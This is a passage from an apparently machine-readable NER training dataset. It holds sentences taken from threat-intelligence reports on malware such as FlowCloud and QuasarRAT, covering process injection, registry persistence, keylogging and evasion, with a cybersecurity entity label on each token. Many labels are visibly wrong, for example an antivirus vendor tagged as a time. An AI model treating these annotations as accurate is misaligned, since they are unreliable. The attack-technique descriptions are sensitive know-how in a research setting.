- "writes", - "it", - "as", - "encrypted", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "it", - "as", - "soon", - "as", - "the", - "utility", - "is", - "running" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "as", - "obfuscated", - "data", - "in", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creating", - "a", - "registry", - "key", - "to", - "store", - "the", - "malware", - "code" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "saves", - "its", - "configuration", - "as", - "a", - "registry", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spawned", - "with", - "PowerShell", - "via", - "Task", - "Scheduler" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creating", - "a", - "scheduled", - "task", - "to", - "execute", - "the", - "malware", - "using", - "PowerShell." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "injected", - "into", - "the", - "winlogon.exe", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "injected", - "into", - "other", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "itself", - "and", - "additional", - "malware(s)", - "into", - "all", - "processes" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "be", - "injected", - "into", - "the", - "winlogon.exe", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "carries", - "out", - "process", - "injections" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "loads", - "a", - "fresh", - "copy", - "of", - "ntdll.dll," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "loading", - "a", - "fresh", - "copy", - "of", - "“ntdll.dll”", - "from", - "disk", - "to", - "avoid", - "process", - "hollowing", - "detection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "via", - "dllhost.exe", - "using", - "process", - "hollowing", - "techniques." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "rootkit", - "when", - "new", - "processes", - "are", - "created" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Injects", - "the", - "rootkit", - "to", - "a", - "newly", - "created", - "process", - "by", - "another", - "process", - "and", - "updates", - "the", - "callee", - "via", - "NamedPipe" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "executes", - "an", - "executable", - "using", - "process", - "hollowing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Enumerates", - "all", - "running", - "processes" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "a", - "file", - "using", - "ShellExecute" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "utilizes", - "the", - "same", - "Common", - "Name", - "in", - "their", - "TLS", - "certificate." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "secure", - "communication", - "through", - "TLS", - "encryption." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "support", - "for", - "TCP", - "network", - "streams", - "(both", - "IPv4", - "and", - "IPv6)," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Controlling", - "attached", - "camera", - "devices", - "to", - "take", - "pictures", - "of", - "the", - "compromised", - "computer’s", - "surroundings." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "takes", - "screenshots", - "at", - "regular", - "intervals." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "periodically", - "take", - "screenshots", - "and", - "store", - "them", - "with", - "information", - "about", - "the", - "foreground", - "process", - "and", - "time", - "since", - "the", - "last", - "user", - "input" - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "limit", - "the", - "disk", - "space", - "used,", - "images", - "where", - "fewer", - "than", - "5%", - "of", - "the", - "pixels", - "differ", - "from", - "the", - "most", - "recently", - "stored", - "capture", - "aren’t", - "saved." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "similar", - "screen", - "captures" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "custom", - "network", - "protocol,", - "which", - "can", - "function", - "over", - "HTTP" - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "we", - "can", - "see", - "one", - "more", - "HTTP", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "POST", - "request", - "used", - "for", - "FlowCloud", - "C&C", - "communication" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "send", - "and", - "receive", - "data", - "over", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "communicates", - "with", - "a", - "hardcoded", - "IP", - "address", - "via", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "can", - "communicate", - "over", - "HTTP", - "or", - "via", - "its", - "“normal", - "protocol”." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "HTTP", - "protocol", - "uses", - "the", - "message", - "format", - "detailed", - "in", - "the", - "previous", - "paragraph,", - "but", - "it", - "adds", - "a", - "few", - "extra", - "steps", - "to", - "disguise", - "its", - "traffic", - "as", - "legitimate", - "HTTP" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "fields", - "required", - "for", - "HTTP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "used", - "for", - "HTTP", - "client", - "requests" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "for", - "HTTP", - "server", - "responses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "by", - "prepending", - "the", - "data", - "with", - "a", - "hardcoded" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "or", - "raw", - "TCP,", - "for", - "C&C", - "server", - "communications." - ], - "ner_tags": [ - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "can", - "communicate", - "over", - "raw", - "TCP", - "sockets." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "normal", - "protocol", - "uses", - "raw", - "TCP", - "sockets", - "and", - "a", - "custom", - "message", - "format" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "B-HackOrg", - "B-Tool", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "which", - "can", - "check", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "can", - "check", - "running", - "processes", - "against", - "a", - "hardcoded", - "list" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "backdoors", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "functionalities", - "that", - "collect", - "information", - "about", - "programs", - "and", - "processes," - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Other", - "commands", - "can", - "be", - "used", - "to", - "retrieve", - "a", - "detailed", - "list", - "of", - "available", - "services", - "and", - "currently", - "running", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "checks", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "running", - "processes", - "using", - "CreateToolhelp32Snapshot", - "and", - "Process32Next" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "PID", - "of", - "the", - "process", - "in", - "which", - "the", - "orchestrator", - "is", - "running." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "found", - "a", - "custom", - "AntivirusCheck", - "class,", - "which", - "can", - "check", - "running", - "processes", - "against", - "a", - "hardcoded", - "list", - "of", - "executable", - "filenames", - "from", - "known", - "security", - "products,", - "including", - "ESET", - "products" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "can", - "check", - "whether", - "specific", - "security", - "software", - "is", - "installed", - "on", - "the", - "machine", - "it", - "tries", - "to", - "compromise," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "there", - "is", - "a", - "custom", - "AntivirusCheck", - "class,", - "which", - "can", - "check", - "running", - "processes", - "against", - "a", - "hardcoded", - "list", - "of", - "XOR-encrypted", - "executable", - "filenames", - "from", - "known", - "security", - "products:", - "360", - "Total", - "Security,", - "Avast,", - "Avira,", - "AVG,", - "Bitdefender,", - "ESET,", - "Jiangmin", - "Technology", - "Antivirus,", - "Kingsoft,", - "McAfee,", - "Micropoint,", - "Norton,", - "Rising", - "Antivirus,", - "and", - "Trend", - "Micro." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Idus", - "B-Time", - "B-Idus", - "B-SecTeam", - "B-Tool", - "B-Org", - "B-Time", - "B-Org", - "B-Tool", - "I-Tool", - "O", - "O", - "B-Time", - "B-SecTeam" - ] - }, - { - "tokens": [ - "It", - "checks", - "running", - "processes", - "for", - "executables", - "of", - "several", - "known", - "cybersecurity", - "vendors." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "contain", - "a", - "section", - "defining", - "specific", - "security", - "software", - "to", - "check", - "for" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "include", - "the", - "ability", - "to", - "collect", - "mouse", - "movements,", - "keyboard", - "activity" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "records", - "keystrokes." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "backdoor’s", - "components", - "records", - "mouse", - "and", - "keyboard", - "activity", - "to", - "a", - "database." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "with", - "the", - "keylogger", - "component", - "of", - "the", - "driver", - "(described", - "in", - "the", - "next", - "section)", - "by", - "reading", - "data", - "from", - "the", - "\\\\.\\pipe\\namedpipe_keymousespy_english", - "named", - "pipe." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "it", - "acts", - "as", - "both", - "a", - "keylogger" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Read", - "(IRP_MJ_READ)", - "for", - "the", - "keyboard", - "driver", - "(kbdclass", - "or", - "KeyboardClass0)" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "handlers", - "for", - "keyboard", - "and", - "mouse", - "events,", - "the", - "driver", - "simply", - "records", - "IO", - "events", - "to", - "lookaside", - "lists", - "before", - "passing", - "them", - "to", - "the", - "legitimate", - "handler." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "by", - "compromising", - "a", - "web-facing", - "application", - "such", - "as", - "Microsoft", - "Exchange", - "or", - "SharePoint" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploited", - "Microsoft", - "SharePoint", - "servers", - "in", - "2019", - "to", - "gain", - "code", - "execution,", - "probably", - "by", - "leveraging", - "CVE-2019-0604" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "The", - "public-facing", - "application", - "compromise", - "approach" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "exploited", - "web", - "server", - "vulnerabilities", - "for", - "initial", - "access." - ], - "ner_tags": [ - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Initial", - "access", - "to", - "targets", - "is", - "obtained", - "by", - "exploiting", - "vulnerable", - "internet-facing", - "applications", - "such", - "as", - "Microsoft", - "Exchange," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "were", - "either", - "dropped", - "directly", - "via", - "the", - "webshell", - "or", - "downloaded", - "from", - "a", - "remote", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "following", - "files", - "are", - "downloaded", - "and", - "written", - "to", - "disk:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "communications", - "module", - "then", - "downloads", - "the", - "main", - "backdoor", - "module," - ], - "ner_tags": [ - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "downloader", - "simply", - "downloads", - "the", - "loader" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Encoded", - "Royal", - "Road", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "encrypted", - "file", - "is" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "identical", - "encrypted", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deployed", - "in", - "a", - "multistage", - "process", - "that", - "uses", - "various", - "obfuscation", - "and", - "encryption", - "techniques", - "to", - "hinder", - "analysis" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "values", - "for", - "these", - "executables", - "and", - "configuration", - "data", - "can", - "be", - "found,", - "encrypted,", - "in", - "the", - "loader’s", - "resource", - "section." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "most", - "resources", - "are", - "written", - "to", - "disk", - "encrypted," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "some", - "cases,", - "they", - "are", - "then", - "re-encrypted", - "but", - "with", - "a", - "different", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "same", - "sequence", - "of", - "opcodes", - "to", - "obfuscate", - "the", - "program’s", - "flow" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "control", - "flow", - "obfuscation", - "snippet" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "files", - "are", - "distributed", - "and", - "stored", - "in", - "encrypted", - "form." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64-encoded", - "strings" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "new", - "encrypted", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "configuration", - "file", - "is", - "encrypted", - "using", - "the", - "just-described", - "function", - "and", - "starts", - "with", - "the", - "magic", - "bytes", - "0xAF1324BC" - ], - "ner_tags": [ - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "encrypted", - "QuasarRAT", - "payload" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "control", - "flow", - "obfuscation", - "to", - "hinder", - "analysis" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "document", - "triggers", - "the", - "injection", - "of", - "a", - "custom", - "downloader", - "–", - "a", - "PE", - "executable", - "–", - "into", - "an", - "iexplore.exe", - "process." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "that", - "decrypts", - "hardcoded", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shellcode", - "decryption", - "loop" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "only", - "decrypted", - "in", - "memory", - "when", - "needed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "loader", - "decrypts", - "and", - "parses", - "the", - "embedded", - "installation", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "rootkit", - "module", - "is", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "self-decrypting", - "DLL," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "[sic]", - "section", - "of", - "a", - "decoded", - "FlowCloud", - "config" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "It", - "first", - "decrypts", - "the", - "embedded", - "DLL", - "using", - "a", - "byte-oriented", - "XOR-and-ADD", - "scheme" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Once", - "it", - "has", - "decrypted", - "the", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Self-decrypting", - "DLL" - ], - "ner_tags": [ - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "loaded", - "shellcode", - "is", - "a", - "self-decrypting", - "DLL." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DLL", - "decryption", - "routine" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "only", - "decoded", - "as", - "needed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "thread", - "that", - "decrypts", - "and", - "loads", - "the", - "fcClient", - "module" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "embedded", - "module" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "into", - "the", - "shellcode", - "that", - "will", - "decompress", - "and", - "load", - "the", - "Korplug", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "It", - "decrypts", - "and", - "loads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "before", - "being", - "written" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "injects", - "it", - "into", - "iexplore.exe", - "using", - "WriteProcessMemory." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "next", - "stage,", - "injected", - "into", - "iexplore.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "injected", - "code", - "loads", - "the", - "same", - "backdoor", - "(rescure.dat)", - "into", - "the", - "process’s", - "memory", - "and", - "calls", - "its", - "startModule", - "export", - "to", - "finish", - "the", - "installation." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "injection", - "process" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "perform", - "process", - "injection", - "to", - "masquerade", - "as", - "harmless", - "processes." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "module", - "creates", - "a", - "new", - "process", - "using", - "the", - "same", - "executable", - "and", - "performs", - "process", - "injection", - "on", - "it,", - "redirecting", - "the", - "existing", - "thread", - "to", - "the", - "written", - "code", - "region." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "loader", - "injects", - "an", - "orchestrator", - "into", - "memory", - "in", - "a", - "svchost.exe", - "process." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "orchestrator", - "injects", - "the", - "network", - "component", - "into", - "memory" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "process", - "into", - "which", - "the", - "shellcode", - "will", - "be", - "injected" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "inject", - "shellcode," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Persistence", - "for", - "the", - "downloaded", - "payload", - "is", - "established", - "via", - "the", - "Tendyron", - "value", - "under", - "the", - "Run", - "key", - "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "task", - "or", - "service", - "attains", - "persistence", - "by", - "being", - "set", - "to", - "start", - "automatically", - "on", - "boot" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "then", - "sets", - "specific", - "registry", - "keys", - "and", - "files", - "as", - "guardrails", - "to", - "skip", - "the", - "setup", - "on", - "subsequent", - "runs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "filenames", - "that", - "are", - "either", - "similar", - "to", - "those", - "of", - "legitimate", - "Windows", - "files", - "(e.g.,", - "rebare.dll", - "which", - "could", - "be", - "mistaken", - "for", - "rebar.dll)", - "or", - "innocuous", - "looking", - "(e.g.,", - "AC146142)", - "to", - "avoid", - "suspicion." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "named", - "after", - "legitimate", - "utilities", - "are", - "written", - "into", - "the", - "%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\", - "subdirectory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "process", - "is", - "further", - "camouflaged", - "by", - "changing", - "its", - "associated", - "executable", - "filename", - "to", - "one", - "of", - "svchost.exe", - "or", - "dllhost.exe", - "in", - "the", - "same", - "kernel", - "structure." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "registry", - "key", - "where", - "each", - "embedded", - "resource", - "is", - "to", - "be", - "written" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "writing", - "to", - "specific", - "registry", - "keys." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Network", - "shellcode", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "in", - "the", - "Windows", - "registry." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shows", - "the", - "three", - "registry", - "keys", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "the", - "files", - "and", - "registry", - 